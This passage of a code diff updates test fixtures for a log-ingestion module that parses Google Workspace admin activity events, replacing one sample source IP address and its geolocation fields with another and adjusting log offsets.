+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"CHANGE_LICENSE_AUTO_ASSIGN\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -188,26 +176,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1398,
+        "log.offset": 1395,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -228,7 +212,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -243,27 +227,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1854,
+        "log.offset": 1850,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -287,7 +267,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -301,26 +281,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2359,
+        "log.offset": 2354,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -341,7 +317,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -355,27 +331,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2812,
+        "log.offset": 2806,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -399,7 +371,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"UPDATE_DYNAMIC_LICENSE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"UPDATE_DYNAMIC_LICENSE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -414,26 +386,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3276,
+        "log.offset": 3269,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log
index 69c376c4453a..67fb978c2592 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log
@@ -1,31 +1,31 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ACTION_CANCELLED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ACTION_REQUESTED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"name"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICES_BULK_CREATION","parameters":[{"name":"NUMBER_OF_COMPANY_OWNED_DEVICES","intValue":10}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_BLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICE_DELETION","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_UNBLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_WIPED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT","parameters":[{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"GROUP"},{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"NEW_PERMISSION_GRANT_STATE","value":"GRANTED"},{"name":"OLD_PERMISSION_GRANT_STATE","value":"DENIED"},{"name":"PERMISSION_GROUP_NAME","value":"LOCATION"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_SETTINGS","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_APPLICATION_TO_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_DELETE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_ADMIN_RESTRICTIONS_PIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"cert"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_ACCOUNT_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ACTION_CANCELLED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
